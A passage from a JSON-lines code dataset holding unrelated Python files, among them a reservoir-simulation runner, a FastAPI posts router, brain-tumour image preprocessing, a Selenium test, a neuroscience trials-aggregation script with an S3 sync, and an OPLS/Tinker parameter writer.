datal[6]\n }\n else:\n cur_dict[datal[1]] = {\n 'CASH_DIVIDEND_RATIO': datal[2],\n 'BONUS_SHARE_RATIO': datal[3],\n 'RIGHTSISSUE_RATIO': datal[4],\n 'RIGHTSISSUE_PRICE': datal[5],\n 'CONVERSED_RATIO': datal[6]\n }\n end = time.time()\n print(\"method 3 -- sum of time: \", end - start)\n print(\"method 3 -- data_dict size {0}\".format(len(data_dict)))\n","repo_name":"domodo2012/quandomo2020","sub_path":"trials/dataframe_to_dict.py","file_name":"dataframe_to_dict.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"75120191184","text":"from tqdm import tqdm\nimport sys\nimport os\nimport subprocess\nimport utils.utilities as u\nfrom datetime import datetime\nfrom pathlib import Path\n\n\nSTORAGE_DIR = './simulations/storage/'\nSTUDIES_DIR = './simulations/studies/'\n\ndef change_control(base_datafile_path, real_datafile_path, controls):\n \n with open(base_datafile_path, 'r') as file :\n filedata = file.read()\n \n # optimization\n for control in controls:\n Name = control[\"Name\"]\n Default = control[\"Default\"]\n if control['type'] == \"float\":\n replaced_value = '%.3f '%Default\n elif control['type'] == \"int\":\n replaced_value = '%s '%int(Default)\n \n filedata = filedata.replace(Name, replaced_value)\n \n # Write the file out again\n with open(real_datafile_path, 'w') as file:\n file.write(filedata)\n\ndef simulate_case(simulator_path, real_name, real_path):\n command = [simulator_path, '--enable-terminal-output=false', real_path]\n \n return command\n \ndef run_case(base_datafile_path, real_datafile_path, controls, simulator_path, real_name):\n change_control(base_datafile_path, real_datafile_path, controls)\n command = simulate_case(simulator_path, real_name, real_datafile_path)\n return command\n\ndef run_cases(simulator_path, study, simfolder_path, controls, n_parallel):\n \n _, tail = os.path.split(study['creation']['root']) # dir_path = /path/to/data\n root_name = os.path.splitext(tail)[0] #root_name = SPE1\n \n base_realizations = study['creation']['base_realizations']\n\n commands = []\n realizations = {}\n l = len(base_realizations)\n for i, real_name in tqdm(enumerate(base_realizations.keys()), total=l, desc=\"Preparing: \"):\n \n real_name = root_name + '_%s'%(i+1) # SPE1_i\n \n real_path = os.path.join(simfolder_path, real_name) # /path/to/data/SPE1_i\n Path(real_path).mkdir(parents=True, exist_ok=True)\n\n real_datafile_path = os.path.join(real_path, real_name + '.DATA') # /path/to/data/SPE1_i/SPE1_i.DATA\n base_datafile_path = base_realizations[real_name]\n command = run_case(base_datafile_path, real_datafile_path, controls, simulator_path, real_name)\n commands.append(command)\n realizations[real_name] = real_datafile_path\n \n u.run_bash_commands_in_parallel(commands, max_tries=1, n_parallel=n_parallel)\n return realizations\n \ndef main(argv):\n\n simulator_path = argv[0]\n study_path = argv[1]\n\n if not os.path.isfile(study_path):\n raise ValueError(\"%s cannot be found\" %study_path)\n\n now = datetime.now()\n timestamp = datetime.timestamp(now)\n dt_start = str(datetime.fromtimestamp(timestamp))\n \n study = u.read_json(study_path)\n \n # create actual realization folders\n simfolder_path = os.path.join(STORAGE_DIR, study['Name'])\n Path(simfolder_path).mkdir(parents=True, exist_ok=True)\n \n config = u.read_json(study['creation']['json'])\n realizations = run_cases(simulator_path, study, simfolder_path, config['controls'], n_parallel=config['n_parallel'])\n 
now = datetime.now()\n timestamp = datetime.timestamp(now)\n dt_end = str(datetime.fromtimestamp(timestamp))\n \n \n studies = u.read_json(study_path)\n studies[\"status\"] = \"simulated\"\n studies[\"simulation\"] = {}\n studies[\"simulation\"][\"start\"] = dt_start\n studies[\"simulation\"][\"end\"] = dt_end\n studies[\"simulation\"][\"realizations\"] = realizations\n \n ens_path = os.path.join(STORAGE_DIR, studies['Name'])\n studies[\"simulation\"][\"storage\"] = ens_path\n \n studies[\"extraction\"] = {} # make sure the data extraction is up-to-date\n \n u.save_to_json(study_path, studies)\n \n\nif __name__ == \"__main__\":\n \"\"\"The arguments are the following:\n 1. study path (str): path to a study json file\n \n Ex: \"python3 src/run_ensemble.py /usr/bin/flow simulations/studies/IE_Poro.json\"\n \"\"\"\n main(sys.argv[1:])","repo_name":"iffanh/petlab","sub_path":"src/run_ensemble.py","file_name":"run_ensemble.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9272740594","text":"from unittest import TestCase\nimport well_profile as wp\nfrom test_create_casing import default_casing\n\n\ndef default_casing_with_trajectory():\n casing = default_casing()\n trajectory = wp.get(2000, profile='J', build_angle=20, kop=800, eob=1300)\n casing.add_trajectory(trajectory)\n\n return casing\n\n\nclass TestCasing(TestCase):\n def test_add_trajectory(self):\n\n casing = default_casing_with_trajectory()\n\n self.assertIsInstance(casing.trajectory.cells_no, int, 'cells_no is not an integer')\n self.assertEqual(len(casing.trajectory.md), casing.trajectory.cells_no,\n 'md has a different number of points')\n self.assertEqual(len(casing.trajectory.tvd), casing.trajectory.cells_no,\n 'tvd has a different number of points')\n self.assertEqual(len(casing.trajectory.inclination), casing.trajectory.cells_no,\n 'incl has different number of points')\n","repo_name":"vamseeachanta/pwploads","sub_path":"tests/test_add_trajectory.py","file_name":"test_add_trajectory.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"25560849159","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom numpy.random import seed\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\nfrom collections import Counter\nfrom tqdm import tqdm\n\nimport h5py\nimport numpy as np \nimport os\nimport cv2\nimport random\nimport matplotlib.pyplot as plt\nimport imgaug as ia\nimport imgaug.augmenters as iaa\nfrom keras.utils.np_utils import to_categorical\nfrom PIL import Image\n\n\n\ndef loadDatasetOne():\n images = np.load(\"/Users/sumitkhare/braintumordatasetNPY/images.npy\", allow_pickle=True)\n labels = np.load(\"/Users/sumitkhare/braintumordatasetNPY/labels.npy\", allow_pickle=True)\n integer_to_class = {1: 'meningioma', 2: 'glioma', 3: 'pituitary tumor'}\n \n for i in range(0,len(labels)):\n if labels[i] == 1.0:\n labels[i] = 0\n if labels[i] == 2.0:\n labels[i] = 1\n if labels[i] == 3.0:\n labels[i] = 2\n return([images,labels])\n\n\ndef loadDatasetTwo():\n \n labelsa = ['glioma_tumor','no_tumor','meningioma_tumor','pituitary_tumor']\n training_data = []\n training_labels = []\n \n for i in labelsa:\n folderPath = os.path.join('/Users/sumitkhare/newDataset/Training',i)\n for j in tqdm(os.listdir(folderPath)):\n 
img = cv2.imread(os.path.join(folderPath,j))\n training_data.append(img)\n training_labels.append(i)\n \n training_data = np.array(training_data)\n training_labels = np.array(training_labels)\n \n return([training_data, training_labels])\n \ndef rgb2Gray(images):\n #Define a new array to store new images in\n arr = []\n #loop through all images\n for i in images:\n #Using CV2 convert the image into grayscale\n img = cv2.cvtColor(i, cv2.COLOR_BGR2GRAY)\n #Reshape the image\n img = img.reshape(256,256,1)\n #Store the image in the new array\n arr.append(img)\n #Return the array of converted images as numpy array\n return np.asarray(arr)\n\n\ndef resizeImages(images, dataset):\n #Empty array to store resized images in\n resizeImages = []\n \n #Loop through all images in dataset\n for i in images:\n #Assign each image to a new variable, use CV2 to resize the images and convert to float32 bit.\n new_img = cv2.resize(i, dsize=(256, 256),interpolation=cv2.INTER_CUBIC).astype(np.float32)\n #Convert the image to numpy array\n new_img = np.asarray(new_img)\n \n #Check if dataset is one, otherwise skip\n if dataset == 1:\n #set new dimensions to single channel\n new_img = new_img.reshape(256,256,1)\n #Append new image to array\n resizeImages.append(new_img)\n #Return the new array as a numpy array\n return np.asarray(resizeImages)\n\ndef reLabelOne(labels):\n newLabels = []\n for i in range(0,len(labels)):\n if labels[i] == 0:\n newLabels.append(1)\n if labels[i] == 1:\n newLabels.append(0)\n if labels[i] == 2:\n newLabels.append(3)\n return newLabels\n\ndef reLabelTwo(labels):\n for i in range(0,len(labels)):\n if labels[i] == 'glioma_tumor':\n labels[i] = 0\n if labels[i] == 'meningioma_tumor':\n labels[i] = 1\n if labels[i] == 'no_tumor':\n labels[i] = 2\n if labels[i] == 'pituitary_tumor':\n labels[i] = 3\n return labels\n\n\ndef augmentImages(image_array, label_array):\n \n seq = iaa.Sequential([\n iaa.Fliplr(0.5), # horizontally flip 50% of the images\n iaa.Affine(\n rotate=(-20, 20),\n shear=(-3, 3))\n ])\n \n augmented_images = seq(images=image_array)\n \n return [augmented_images, label_array]\n\ndef rotateDatasetOne(image_array, label_array):\n \n seq = iaa.Sequential([\n iaa.Affine(\n rotate=(90)),\n ])\n \n augmented_images = seq(images=image_array)\n \n return [augmented_images, label_array]\n\n\ndef loadNumpyDataset(dataSet):\n try:\n returnData = np.load(dataSet, allow_pickle=True)\n print(f'Dataset: {dataSet} loaded successfully')\n return returnData\n except Exception as e: \n print(f'Dataset Failed to load: \\n{e}')\n","repo_name":"Rashi-Bhave/Brain-tumour-detection","sub_path":"FYP_processing2.py","file_name":"FYP_processing2.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"23768096117","text":"'''\nBinary search implementation\n'''\n\n\n# Find the index of key in the list l (returns None if key is absent)\ndef search(l, key):\n low, high = 0, len(l) - 1\n\n while low <= high:\n # Index of the middle element\n mid = (low + high) // 2\n if l[mid] < key:\n low = mid + 1\n elif l[mid] > key:\n high = mid - 1\n else:\n return mid\n\n\nl = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\nprint('Key index:', search(l, 11))\n","repo_name":"fanxiao168/pythonStudy","sub_path":"AIDStudy/02-DateStruct/day03/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"29796106270","text":"from fastapi import APIRouter, Depends, status, HTTPException, 
Response\nfrom sqlalchemy.orm import Session\nfrom typing import List\n\nfrom social_network.db.db import get_db\nfrom social_network.db.models import User\nfrom social_network.utils.auth import get_current_user\nfrom social_network.utils.crud import PostCrud\nfrom social_network import schemas\n\nrouter = APIRouter(\n prefix='/api',\n tags=['Posts']\n)\n\n@router.get('/posts', response_model=List[schemas.Post])\ndef get_all_posts(db: Session = Depends(get_db)):\n return PostCrud(db).get()\n\n@router.get('/posts/{post_id}', response_model=schemas.Post)\ndef get_post(post_id: int, db: Session = Depends(get_db)):\n post = PostCrud(db).get(post_id, 'id')\n if post:\n return post\n else:\n raise HTTPException(status_code=404)\n \n@router.post('/posts', response_model=schemas.Post, status_code=201)\ndef post_a_post(data: schemas.PostCreate, user: User = Depends(get_current_user), db: Session = Depends(get_db)):\n data.user_id = user.id\n post = PostCrud(db).post(data=data)\n return post\n\n@router.put('/posts/{post_id}', response_model=schemas.Post)\ndef put(post_id: int, data: schemas.PostCreate, user: User = Depends(get_current_user), db: Session = Depends(get_db)):\n post_crud = PostCrud(db)\n post = post_crud.get(post_id, 'id')\n if not post:\n raise HTTPException(status_code=404)\n if post.user_id != user.id:\n raise HTTPException(status_code=401)\n data.user_id = user.id\n post = PostCrud(db).put(data=data, id=post_id)\n return post\n\n@router.delete('/posts/{post_id}', status_code=204)\ndef delete(post_id: int, user: User = Depends(get_current_user), db: Session = Depends(get_db)):\n post_crud = PostCrud(db)\n post = post_crud.get(post_id, 'id')\n if not post:\n raise HTTPException(status_code=404)\n if post.user_id != user.id:\n raise HTTPException(status_code=401)\n post = PostCrud(db).delete(post_id)\n","repo_name":"NickFlabel/fastAPI_small_social_network","sub_path":"social_network/routers/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"8515664303","text":"import pytest\nimport time\nfrom selenium import webdriver\n\ndata = ['selenium', 'pytest', 'parameterized']\n\n\n@pytest.fixture(scope='class')\ndef driver():\n driver = webdriver.Chrome()\n yield driver\n driver.quit()\n\n\n@pytest.fixture\ndef baidu_search(request, driver):\n driver.get('https://www.baidu.com/')\n driver.find_element_by_id('kw').send_keys(request.param)\n driver.find_element_by_id('su').click()\n time.sleep(2)\n return request.param, driver.title\n\n\nclass TestBaidu:\n @pytest.mark.parametrize('baidu_search', data, indirect=True)\n def test_search(self, baidu_search):\n expected, result = baidu_search\n assert expected in result\n","repo_name":"emuyi/test-dev-skills","sub_path":"projects/test_selenium/test_baidu_parametrize.py","file_name":"test_baidu_parametrize.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"32279484619","text":"from django.db.models import Count, Q\nfrom actions.models import Session\nfrom subjects.models import Subject\nfrom data.models import Dataset, DatasetType, DataFormat, DataRepository, FileRecord, Revision\nfrom misc.models import LabMember\n\nimport logging\nimport logging.handlers # RotatingFileHandler is used below; plain 'import logging' does not load the handlers submodule\nimport datetime\nimport time\nimport hashlib\nfrom pathlib import Path\nfrom subprocess import Popen, PIPE, STDOUT\n\nimport pandas as pd\nimport globus_sdk as globus\n\nfrom 
one.alf import io as alfio, files as alfiles\nfrom iblutil.io import hashfile, params\nfrom ibllib.io.extractors.training_trials import StimOnTriggerTimes\n\n\"\"\"\nGenerate per subject trials aggregate files for all culled subjects that have at least one session with an ibl project\nand ibl task protocol.\n1. Check if all sessions have trials tables. For those that don't, try to generate them.\n Log if it's not possible and skip those sessions.\n2. Check for which subjects trial aggregate files need to be generated or updated\n (using hash of individual dataset uuids and hashes)\n a. If file exists and does not need updating, do nothing.\n b. If this is the first version of the file, generate and register dataset, create file records, sync to AWS\n c. If original file is protected, create and register new revision of dataset.\n d. If original file is not protected, overwrite it, update hash and file size of dataset.\n3. Sync to AWS.\n\n# Adapted from\n# https://github.com/int-brain-lab/ibldevtools/blob/master/olivier/archive/2022/2022-03-14_trials_tables.py\n# https://github.com/int-brain-lab/ibldevtools/blob/master/miles/2022-01-17-alyx_trials_table_patch.py\n# https://github.com/int-brain-lab/ibldevtools/blob/master/miles/2022-12-19_register-zainab-aggregates.py\n\"\"\"\n\n'''\n===========\nSETTING UP\n===========\n'''\n\n# Flags\ndry = True # Only tell me which files would be created, don't do anything\nonly_new_subjects = True # Only create aggregates for subjects that don't have an aggregate yet, don't check for update\n\n# Settings\nroot_path = Path('/mnt/ibl')\noutput_path = Path('/mnt/ibl/aggregates/')\ncollection = 'Subjects'\nfile_name = '_ibl_subjectTrials.table.pqt'\nalyx_user = 'julia.huntenburg'\nversion = 1.0\n\n# Set up\noutput_path.mkdir(exist_ok=True, parents=True)\nalyx_user = LabMember.objects.get(username=alyx_user)\ntoday_revision = datetime.datetime.today().strftime('%Y-%m-%d')\n\n# Prepare logger\ntoday = datetime.datetime.today().strftime('%Y%m%d')\nlogger = logging.getLogger('ibllib')\nlogger.setLevel(logging.INFO)\nhandler = logging.handlers.RotatingFileHandler(output_path.joinpath(f'subjectTrials_{today}.log'),\n maxBytes=(1024 * 1024 * 256), )\nlogger.addHandler(handler)\n\n\n# Functions\ndef log_subprocess_output(pipe, log_function=print):\n for line in iter(pipe.readline, b''):\n log_function(line.decode().strip())\n\n\ndef login_auto(globus_client_id, str_app='globus/default'):\n token = params.read(str_app, {})\n required_fields = {'refresh_token', 'access_token', 'expires_at_seconds'}\n if not (token and required_fields.issubset(token.as_dict())):\n raise ValueError(\"Token file doesn't exist, run ibllib.io.globus.setup first\")\n client = globus.NativeAppAuthClient(globus_client_id)\n client.oauth2_start_flow(refresh_tokens=True)\n authorizer = globus.RefreshTokenAuthorizer(token.refresh_token, client)\n return globus.TransferClient(authorizer=authorizer)\n\n\n# Set up dictionaries to catch errors or other logs\nstatus_agg = {}\n\n\"\"\"\"\n========================\nSUBJECT AGGREGATE TABLES\n========================\n\"\"\"\n# Now find all culled subjects with at least one session in an ibl project\nsessions = Session.objects.filter(project__name__icontains='ibl')\nsubjects = Subject.objects.filter(id__in=sessions.values_list('subject'), cull__isnull=False\n ).exclude(nickname__icontains='test')\n# Also make sure to only keep subjects that have at least one session with ibl task protocol and a trials table\nsessions = 
Session.objects.filter(subject__in=subjects, task_protocol__icontains='ibl')\nsessions = sessions.annotate(\n trials_table_count=Count('data_dataset_session_related',\n filter=Q(data_dataset_session_related__name='_ibl_trials.table.pqt')))\nsessions = sessions.exclude(trials_table_count=0)\nsubjects = Subject.objects.filter(id__in=sessions.values_list('subject'))\n\n# dataset format, type and repos\ndataset_format = DataFormat.objects.get(name='parquet')\ndataset_type = DatasetType.objects.get(name='subjectTrials.table')\naws_repo = DataRepository.objects.get(name='aws_aggregates')\nfi_repo = DataRepository.objects.get(name='flatiron_aggregates')\n\n# Go through subjects and check if aggregate needs to be (re)created\nlogger.info('\\n')\nlogger.info(f' {subjects.count()} SUBJECTS')\n# existing files with this file name\nall_ds = Dataset.objects.filter(name=file_name, default_dataset=True)\n\nfor i, sub in enumerate(subjects):\n try:\n print(f'{i}/{subjects.count()} {sub.nickname}')\n logger.info(f'Subject {sub.nickname} {sub.id}')\n # Find all sessions of this subject\n sub_sess = Session.objects.filter(subject=sub, task_protocol__icontains='ibl')\n # First create hash and check if aggregate needs to be (re)created\n trials_ds = Dataset.objects.filter(session__in=sub_sess, name='_ibl_trials.table.pqt', default_dataset=True)\n trials_ds = trials_ds.order_by('hash')\n # For sessions that have a trials table, add the task data files\n task_ds = Dataset.objects.filter(session__in=trials_ds.values_list('session', flat=True),\n name__in=['_iblrig_taskSettings.raw.json', '_iblrig_taskData.raw.jsonable'],\n default_dataset=True)\n # If we don't have task data for each session, well that's a problem\n if task_ds.count() / 2 < trials_ds.count():\n logger.info('...not all sessions have raw task data')\n status_agg[f'{sub.id}'] = 'ERROR: not all sessions have raw task data'\n continue\n else:\n hash_ds = trials_ds | task_ds\n hash_ds = hash_ds.order_by('hash')\n hash_str = ''.join([str(item) for pair in hash_ds.values_list('hash', 'id') for item in pair]).encode('utf-8')\n new_hash = hashlib.md5(hash_str).hexdigest()\n revision = None # Only set if making a new revision is required\n # Check if this dataset exists\n ds_id = next((d.id for d in all_ds if d.content_object == sub), None)\n ds = Dataset.objects.filter(id=ds_id)\n # If there is exactly one default dataset, check if it needs updating\n if ds.count() == 1:\n if only_new_subjects:\n logger.info('...aggregate exists and only_new_subjects=True, skipping')\n continue\n if ds.first().revision is None:\n out_file = output_path.joinpath(collection, sub.lab.name, sub.nickname, file_name)\n else:\n out_file = output_path.joinpath(collection, sub.lab.name, sub.nickname, ds.first().revision, file_name)\n # See if the file exists on disk (we are on SDSC so need to check with uuid in name)\n # If yes, create the expected hash and try to compare to the hash of the existing file\n if alfiles.add_uuid_string(out_file, ds.first().pk).exists():\n try:\n old_hash = ds.first().json['aggregate_hash']\n except TypeError:\n # If the json doesn't have the hash, just set it to None, we recreate the file in this case\n old_hash = None\n # If the hash is the same we don't need to do anything\n if old_hash == new_hash:\n logger.info('...aggregate exists and is up to date')\n status_agg[f'{sub.id}'] = 'EXIST: aggregate exists, hash match'\n continue\n else:\n # Otherwise check if the file is protected, if yes, create a revision, otherwise overwrite\n if 
ds.first().is_protected:\n logger.info('...aggregate already exists but is protected, hash mismatch, creating revision')\n status_agg[f'{sub.id}'] = 'REVISION: aggregate exists protected, hash mismatch'\n # Make revision other than None and add revision to file path\n revision, _ = Revision.objects.get_or_create(name=today_revision)\n if ds.first().revision is None:\n out_file = out_file.parent.joinpath(f\"#{today_revision}#\", out_file.name)\n else:\n # If the current default is already a revision, remove the revision part of the path\n out_file = out_file.parent.parent.joinpath(f\"#{today_revision}#\", out_file.name)\n else:\n logger.info('...aggregate already exists but is not protected, hash mismatch, overwriting')\n status_agg[f'{sub.id}'] = 'OVERWRITE: aggregate exists not protected, hash mismatch'\n # Add the uuid to the out file to overwrite the current file\n out_file = alfiles.add_uuid_string(out_file, ds.first().pk)\n # If the dataset entry exist but the dataset cannot be found on disk, just recreate the dataset\n else:\n logger.info('...dataset entry exists but file is missing on disk, creating new')\n status_agg[f'{sub.id}'] = 'CREATE: aggregate dataset entry exists, file missing'\n # Here, too, update the file name with the uuid to create the file on disk\n out_file = alfiles.add_uuid_string(out_file, ds.first().pk)\n # If no dataset exists yet, create it\n elif ds.count() == 0:\n out_file = output_path.joinpath(collection, sub.lab.name, sub.nickname, file_name)\n logger.info('...aggregate does not yet exist, creating.')\n status_agg[f'{sub.id}'] = 'CREATE: aggregate does not exist'\n\n # If dry run, stop here\n if dry:\n logger.info(f'...DRY RUN would create {out_file}')\n continue\n # Create aggregate dataset and save to disk\n all_trials = []\n for t in trials_ds:\n # load trials table\n alf_path = root_path.joinpath(sub.lab.name, 'Subjects', t.file_records.filter(\n data_repository__name__startswith='flatiron').first().relative_path).parent\n trials = alfio.load_object(alf_path, 'trials', attribute='table', short_keys=True)\n trials = trials.to_df()\n\n # Add to list of trials for subject\n trials['session'] = str(t.session.id)\n trials['session_start_time'] = t.session.start_time\n\n # Load quiescence and stimOn_trigger and add to the table\n quiescence = alfio.load_object(alf_path, 'trials',\n attribute='quiescencePeriod', short_keys=True)['quiescencePeriod']\n stimon_trigger, _ = StimOnTriggerTimes(alf_path.parent).extract(save=False)\n trials['quiescence'] = quiescence\n trials['stimOnTrigger_times'] = stimon_trigger\n # TODO: Add protocol number\n # Add to list of trials for subject\n all_trials.append(trials)\n\n # Concatenate trials from all sessions for subject and save\n df_trials = pd.concat(all_trials, ignore_index=True)\n out_file.parent.mkdir(parents=True, exist_ok=True)\n df_trials.to_parquet(out_file)\n assert out_file.exists(), f'Failed to save to {out_file}'\n assert not pd.read_parquet(out_file).empty, f'Failed to read {out_file}'\n logger.info(f\"...Saved {out_file}\")\n\n # Get file size and hash which we need in any case\n file_hash = hashfile.md5(out_file)\n file_size = out_file.stat().st_size\n # If we overwrote an existing file, update hashes and size in the dataset entry\n if ds.count() == 1 and revision is None:\n ds.update(hash=file_hash, file_size=file_size, json={'aggregate_hash': new_hash})\n logger.info(f\"...Updated hash and size of existing dataset entry {ds.first().pk}\")\n # If we made a new file or revision, create new dataset entry and 
file records\n else:\n # Create dataset entry (make default)\n new_ds = Dataset.objects.create(\n name=file_name,\n hash=file_hash,\n file_size=file_size,\n json={'aggregate_hash': new_hash},\n revision=revision,\n collection=collection,\n default_dataset=True,\n dataset_type=dataset_type,\n data_format=dataset_format,\n created_by=alyx_user,\n version=version,\n content_object=sub,\n )\n # Validate dataset\n new_ds.full_clean()\n new_ds.save()\n # Make previous default dataset not default anymore (if there was one)\n if ds.count() == 1:\n _ = ds.update(default_dataset=False)\n # Change name on disk to include dataset id\n new_out_file = out_file.rename(alfiles.add_uuid_string(out_file, new_ds.pk))\n assert new_out_file.exists(), f\"Failed to save renamed file {new_out_file}\"\n logger.info(f\"...Renamed file to {new_out_file}\")\n # Create one file record per repository\n for repo in [aws_repo, fi_repo]:\n record = {\n 'dataset': new_ds,\n 'data_repository': repo,\n 'relative_path': str(out_file.relative_to(output_path)),\n 'exists': False if repo.name.startswith('aws') else True\n }\n try:\n _ = FileRecord.objects.get_or_create(**record)\n except BaseException as e:\n logger.error(f'...ERROR: Failed to create file record on {repo.name}: {e}')\n status_agg[f'{sub.id}'] = f'ERROR: Failed to create file record on {repo.name}: {e}'\n continue\n\n logger.info(f\"...Created new dataset entry {new_ds.pk} and file records\")\n\n except Exception as e:\n logger.error(f\"...Error for subject {sub.nickname}: {e}\")\n status_agg[f'{sub.id}'] = f'ERROR: {e}'\n continue\n\n# Save status to file\nstatus_agg = pd.DataFrame.from_dict(status_agg, orient='index', columns=['status'])\nstatus_agg.insert(0, 'subject_id', status_agg.index)\nstatus_agg.reset_index(drop=True, inplace=True)\nstatus_agg.to_csv(root_path.joinpath('subjects_trials_status.csv'))\n\nif not dry:\n # Sync whole collection folder to AWS (for now)\n src_dir = str(output_path.joinpath(collection))\n dst_dir = f's3://ibl-brain-wide-map-private/aggregates/{collection}'\n cmd = ['aws', 's3', 'sync', src_dir, dst_dir, '--delete', '--profile', 'ibladmin', '--no-progress']\n logger.info(f\"Syncing {src_dir} to AWS: \" + \" \".join(cmd))\n t0 = time.time()\n process = Popen(cmd, stdout=PIPE, stderr=STDOUT)\n with process.stdout:\n log_subprocess_output(process.stdout, logger.info)\n assert process.wait() == 0\n logger.debug(f'Session sync took {(time.time() - t0)} seconds')\n # Assume that everyting that existed in that folder on FI was synced and set file records to exist\n fi_frs = FileRecord.objects.filter(data_repository=fi_repo, relative_path__startswith=collection, exists=True)\n aws_frs = FileRecord.objects.filter(data_repository=aws_repo, dataset__in=fi_frs.values_list('dataset', flat=True))\n logger.info(f\"Setting {aws_frs.count()} AWS file records to exists=True\")\n aws_frs.update(exists=True)\n","repo_name":"int-brain-lab/iblscripts","sub_path":"analysis_crons/subject_trials_aggregates.py","file_name":"subject_trials_aggregates.py","file_ext":"py","file_size_in_byte":15900,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"71579579025","text":"import pickle \nimport pandas as pd\nfrom AlchemicalAssistant.Vector_algebra import AtomNum2Mass \nfrom AlchemicalAssistant.FEPBOSSReader import tor_cent\n\ndef xyz_prep(atoms, coos, bonds, f_df, resid='A2B',pdbname='COMBO'):\n opdb = open(pdbname+'_tinker.xyz', 'w+')\n opdb.write('%6d %s LigParGen generated OPLS-AA/CM1A 
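Aside: the rename step above relies on `alfiles.add_uuid_string` to splice the new dataset's primary key into the file name before the extension. A minimal sketch of what such a helper presumably does (the real ALF implementation may differ):

```python
from pathlib import Path

def add_uuid_string(file_path, pk) -> Path:
    # Assumed behaviour, e.g.:
    # '_ibl_subjectTrials.table.pqt' + 'abc' -> '_ibl_subjectTrials.table.abc.pqt'
    p = Path(file_path)
    return p.parent.joinpath(f"{p.stem}.{pk}{p.suffix}")
```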
Parameters\\n'%(len(atoms),resid))\n for i,r in f_df.iterrows():\n atom_blist = list(bonds[bonds.cl1==i+3]['cl2'])+list(bonds[bonds.cl2==i+3]['cl1'])\n line_atom_blist = ''.join(['%6d'%(l-2) for l in atom_blist])\n opdb.write('%6d%3s%14.6f%12.6f%12.6f%6d%s\\n'%(i+1,r.SYM,r.X,r.Y,r.Z,r.OPLSN,line_atom_blist))\n opdb.close()\n return None\n\ndef tinker_prm(complete_atom_df,all_dfs, pdbname='COMBO'):\n# at_df = pd.read_csv('csv_tinker.csv') \n at_df = complete_atom_df\n df_bnds = all_dfs['BONDS']\n ang_df = all_dfs['ANGLE']\n tor_df = all_dfs['DIHED']\n uid2onum = at_df.set_index('UID')['OPLSN'].to_dict()\n prm = open(pdbname + '.key', 'w+')\n prm.write(\n'''\n\n ##############################\n ## ##\n ## Force Field Definition ##\n ## ##\n ##############################\n\n\nforcefield OPLS-AA\n\nvdwindex TYPE\nvdwtype LENNARD-JONES\nradiusrule GEOMETRIC\nradiustype SIGMA\nradiussize DIAMETER\nepsilonrule GEOMETRIC\ntorsionunit 1.0\nimptorunit 1.0\nvdw-14-scale 2.0\nchg-14-scale 2.0\nelectric 332.06\ndielectric 1.0\n\n\n #############################\n ## ##\n ## Atom Type Definitions ##\n ## ##\n #############################\n\n\n''')\n\n for i,r in at_df.iterrows():\n numbs = list(df_bnds[df_bnds.cl1==i+3]['cl2'])+list(df_bnds[df_bnds.cl2==i+3]['cl1'] )\n prm.write('atom %10d %4d %5s %8s %10d %10.3f %5d\\n' %\n (r.OPLSN,r.OPLSN,r.at_ty,'\\\"'+r.at_symb+'\\\"',r.at_num,AtomNum2Mass(r.at_num),len(numbs)))\n prm.write(\n'''\n\n\n ################################\n ## ##\n ## Van der Waals Parameters ##\n ## ##\n ################################\n\n\n''')\n for i,r in at_df.iterrows():\n prm.write('vdw %11d %16.4f %8.4f \\n' %\n (r.OPLSN, r.SIG, r.EPS))\n prm.write(\n'''\n\n\n ##################################\n ## ##\n ## Bond Stretching Parameters ##\n ## ##\n ##################################\n\n\n'''\n)\n # ask about this one\n for index, row in df_bnds.iterrows():\n atom1_type = uid2onum[row.Ncl1]\n atom2_type = uid2onum[row.Ncl2]\n R = row['RIJ']\n K = row['KIJ']\n\n prm.write('bond %10d %4d %16.2f %8.4f \\n' %\n (atom1_type, atom2_type, K, R))\n\n prm.write(\n'''\n\n\n ################################\n ## ##\n ## Angle Bending Parameters ##\n ## ##\n ################################\n\n\n''')\n for index, row in ang_df.iterrows():\n atom1_type = uid2onum[row['Ncl1']]\n atom2_type = uid2onum[row['Ncl2']]\n atom3_type = uid2onum[row['Ncl3']]\n# R = float(row['R'])\n# K = float(row['K'])\n\n prm.write('angle %9d %4d %4d %8.2f %8.2f \\n' %\n (atom1_type, atom2_type, atom3_type, row.K, row.R))\n prm.write(\n'''\n\n\n ################################\n ## ##\n ## Urey-Bradley Parameters ##\n ## ##\n ################################\n\n\nureybrad 35 34 35 38.25 1.5537\n\n\n #####################################\n ## ##\n ## Improper Torsional Parameters ##\n ## ##\n #####################################\n\n\n\n''')\n for index, row in tor_df.iterrows():\n if row['IMP'] == True:\n cen_nums = tor_cent([row.I,row.J,row.K,row.L],list(df_bnds.UID))\n# atom1_type = int(num2typ2symb[cen_nums[1]][1][5:])#int[int(row['I'])][1].strip('_opls'))\n atom1_type = at_df.ix[cen_nums[1]-3]['OPLSN'] \n# atom2_type = int(num2typ2symb[cen_nums[2]][1][5:])#int[int(row['I'])][1].strip('_opls'))\n atom2_type = at_df.ix[cen_nums[2]-3]['OPLSN'] \n# atom3_central_type = int(num2typ2symb[cen_nums[0]][1][5:]) #int(types[int(row['J'])][1].strip('_opls'))\n atom3_central_type = at_df.ix[cen_nums[0]-3]['OPLSN'] \n #atom4_type = 